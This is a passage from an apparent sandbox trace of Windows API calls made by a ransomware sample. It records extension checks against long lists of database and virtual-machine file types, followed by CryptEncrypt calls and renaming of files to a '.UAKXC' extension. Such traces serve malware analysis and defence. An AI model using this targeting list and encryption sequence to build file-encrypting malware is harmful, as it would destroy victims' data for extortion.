Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".icg") returned 0x0 [0158.247] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".icr") returned 0x0 [0158.247] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".kdb") returned 0x0 [0158.247] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".lut") returned 0x0 [0158.247] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".maw") returned 0x0 [0158.247] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mdn") returned 0x0 [0158.247] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".mdt") returned 0x0 [0158.247] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vdi") returned 0x0 [0158.247] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vhd") returned 0x0 [0158.247] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmdk") returned 0x0 [0158.247] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".pvm") returned 0x0 [0158.248] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmem") returned 0x0 [0158.248] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmsn") returned 0x0 [0158.248] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmsd") returned 0x0 [0158.248] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".nvram") returned 0x0 [0158.248] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmx") returned 0x0 [0158.248] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".raw") returned 0x0 [0158.248] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".qcow2") returned 0x0 [0158.248] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".subvol") returned 0x0 [0158.248] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".bin") returned 0x0 [0158.248] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vsv") returned 0x0 [0158.248] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".avhd") returned 0x0 [0158.248] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmrs") returned 0x0 [0158.248] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vhdx") returned 0x0 [0158.248] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".avdx") returned 0x0 [0158.248] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".vmcx") returned 0x0 [0158.248] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".iso") returned 0x0 [0158.248] SetFilePointerEx (in: hFile=0x6ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.248] WriteFile (in: hFile=0x6ec, lpBuffer=0x373fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x373fc78, lpOverlapped=0x0 | out: lpBuffer=0x373fd70*, lpNumberOfBytesWritten=0x373fc78*=0x20c, lpOverlapped=0x0) returned 1 [0158.258] WriteFile (in: hFile=0x6ec, lpBuffer=0x373fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x373fc7c, lpOverlapped=0x0 | out: lpBuffer=0x373fc80*, lpNumberOfBytesWritten=0x373fc7c*=0xa, lpOverlapped=0x0) returned 1 [0158.258] SetEndOfFile (hFile=0x6ec) returned 1 [0158.258] SetFilePointerEx (in: hFile=0x6ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.258] ReadFile (in: hFile=0x6ec, lpBuffer=0x4100000, nNumberOfBytesToRead=0x93a, lpNumberOfBytesRead=0x373fc88, lpOverlapped=0x0 | out: lpBuffer=0x4100000*, lpNumberOfBytesRead=0x373fc88*=0x93a, lpOverlapped=0x0) returned 1 [0158.259] SetFilePointerEx (in: hFile=0x6ec, liDistanceToMove=0xfffff6c6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0158.259] WriteFile (in: hFile=0x6ec, lpBuffer=0x4100000*, nNumberOfBytesToWrite=0x93a, lpNumberOfBytesWritten=0x373fc44, lpOverlapped=0x0 | out: lpBuffer=0x4100000*, lpNumberOfBytesWritten=0x373fc44*=0x93a, lpOverlapped=0x0) returned 1 [0158.259] CloseHandle (hObject=0x6ec) returned 1 [0158.263] GetProcessHeap () returned 0xea0000 [0158.263] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0x77920d0 [0158.263] lstrcpyW (in: lpString1=0x77920d0, lpString2="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" [0158.263] lstrcatW (in: lpString1="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".UAKXC" | out: lpString1="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.UAKXC") returned="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.UAKXC" [0158.263] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml.UAKXC" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml.uakxc")) returned 1 [0158.264] GetProcessHeap () returned 0xea0000 [0158.264] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0x77920d0 | out: hHeap=0xea0000) returned 1 [0158.264] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef5ff8 | out: hHeap=0xea0000) returned 1 [0158.264] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee6d80 | out: hHeap=0xea0000) returned 1 [0158.264] CryptGenRandom (in: hProv=0xece568, dwLen=0x20, pbBuffer=0x373fd50 | out: pbBuffer=0x373fd50) returned 1 [0158.264] CryptGenRandom (in: hProv=0xece568, dwLen=0x8, pbBuffer=0x373fd48 | out: pbBuffer=0x373fd48) returned 1 [0158.264] CryptEncrypt (in: hKey=0xece4f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x28, dwBufLen=0x20c | out: pbData=0x373fd70*, pdwDataLen=0x373fc8c*=0x200) returned 1 [0158.265] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab")) returned 0x2020 [0158.265] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6ec [0158.265] GetLastError () returned 0x0 [0158.265] GetFileSizeEx (in: hFile=0x6ec, lpFileSize=0x373fc88 | out: lpFileSize=0x373fc88*=18874884) returned 1 [0158.265] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".4dd") returned 0x0 [0158.266] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".4dl") returned 0x0 [0158.266] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".accdb") returned 0x0 [0158.266] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".accdc") returned 0x0 [0158.266] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".accde") returned 0x0 [0158.266] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".accdr") returned 0x0 [0158.266] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".accdt") returned 0x0 [0158.266] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".accft") returned 0x0 [0158.266] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".adb") returned 0x0 [0158.266] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".ade") returned 0x0 [0158.266] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".adf") returned 0x0 [0158.266] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".adp") returned 0x0 [0158.266] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".arc") returned 0x0 [0158.266] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".ora") returned 0x0 [0158.266] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".alf") returned 0x0 [0158.266] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".ask") returned 0x0 [0158.266] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".btr") returned 0x0 [0158.266] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".bdf") returned 0x0 [0158.266] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".cat") returned 0x0 [0158.266] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".cdb") returned 0x0 [0158.266] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".ckp") returned 0x0 [0158.266] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".cma") returned 0x0 [0158.266] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".cpd") returned 0x0 [0158.267] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".dacpac") returned 0x0 [0158.267] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".dad") returned 0x0 [0158.267] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".dadiagrams") returned 0x0 [0158.267] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".daschema") returned 0x0 [0158.267] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".db") returned 0x0 [0158.267] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".db-shm") returned 0x0 [0158.267] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".db-wal") returned 0x0 [0158.267] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".db3") returned 0x0 [0158.267] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".dbc") returned 0x0 [0158.267] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".dbf") returned 0x0 [0158.267] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".dbs") returned 0x0 [0158.267] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".dbt") returned 0x0 [0158.267] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".dbv") returned 0x0 [0158.267] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".dbx") returned 0x0 [0158.267] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".dcb") returned 0x0 [0158.267] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".dct") returned 0x0 [0158.267] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".dcx") returned 0x0 [0158.267] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".ddl") returned 0x0 [0158.267] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".dlis") returned 0x0 [0158.268] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".dp1") returned 0x0 [0158.268] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".dqy") returned 0x0 [0158.268] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".dsk") returned 0x0 [0158.268] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".dsn") returned 0x0 [0158.268] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".dtsx") returned 0x0 [0158.268] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".dxl") returned 0x0 [0158.268] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".eco") returned 0x0 [0158.268] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".ecx") returned 0x0 [0158.268] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".edb") returned 0x0 [0158.268] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".epim") returned 0x0 [0158.268] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".exb") returned 0x0 [0158.268] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".fcd") returned 0x0 [0158.268] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".fdb") returned 0x0 [0158.268] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".fic") returned 0x0 [0158.268] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".fmp") returned 0x0 [0158.268] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".fmp12") returned 0x0 [0158.268] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".fmpsl") returned 0x0 [0158.268] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".fol") returned 0x0 [0158.268] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".fp3") returned 0x0 [0158.268] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".fp4") returned 0x0 [0158.268] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".fp5") returned 0x0 [0158.269] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".fp7") returned 0x0 [0158.269] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".fpt") returned 0x0 [0158.269] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".frm") returned 0x0 [0158.269] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".gdb") returned 0x0 [0158.269] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".grdb") returned 0x0 [0158.269] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".gwi") returned 0x0 [0158.269] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".hdb") returned 0x0 [0158.269] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".his") returned 0x0 [0158.269] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".ib") returned 0x0 [0158.269] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".idb") returned 0x0 [0158.269] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".ihx") returned 0x0 [0158.269] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".itdb") returned 0x0 [0158.269] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".itw") returned 0x0 [0158.269] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".jet") returned 0x0 [0158.269] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".jtx") returned 0x0 [0158.269] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".kdb") returned 0x0 [0158.269] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".kexi") returned 0x0 [0158.269] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".kexic") returned 0x0 [0158.269] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".kexis") returned 0x0 [0158.269] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".lgc") returned 0x0 [0158.269] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".lwx") returned 0x0 [0158.269] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".maf") returned 0x0 [0158.269] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".maq") returned 0x0 [0158.270] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".mar") returned 0x0 [0158.270] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".mas") returned 0x0 [0158.270] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".mav") returned 0x0 [0158.270] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".mdb") returned 0x0 [0158.270] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".mdf") returned 0x0 [0158.270] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".mpd") returned 0x0 [0158.270] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".mrg") returned 0x0 [0158.270] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".mud") returned 0x0 [0158.270] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".mwb") returned 0x0 [0158.270] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".myd") returned 0x0 [0158.270] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".ndf") returned 0x0 [0158.270] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".nnt") returned 0x0 [0158.270] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".nrmlib") returned 0x0 [0158.270] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".ns2") returned 0x0 [0158.270] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".ns3") returned 0x0 [0158.270] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".ns4") returned 0x0 [0158.270] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".nsf") returned 0x0 [0158.270] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".nv") returned 0x0 [0158.270] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".nv2") returned 0x0 [0158.270] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".nwdb") returned 0x0 [0158.270] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".nyf") returned 0x0 [0158.270] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".odb") returned 0x0 [0158.270] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".oqy") returned 0x0 [0158.270] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".orx") returned 0x0 [0158.270] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".owc") returned 0x0 [0158.270] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".p96") returned 0x0 [0158.271] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".p97") returned 0x0 [0158.271] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab", lpSrch=".pan") returned 0x0 [0158.271] StrStrIW (lpFirst="C:\\MSOCache\\All 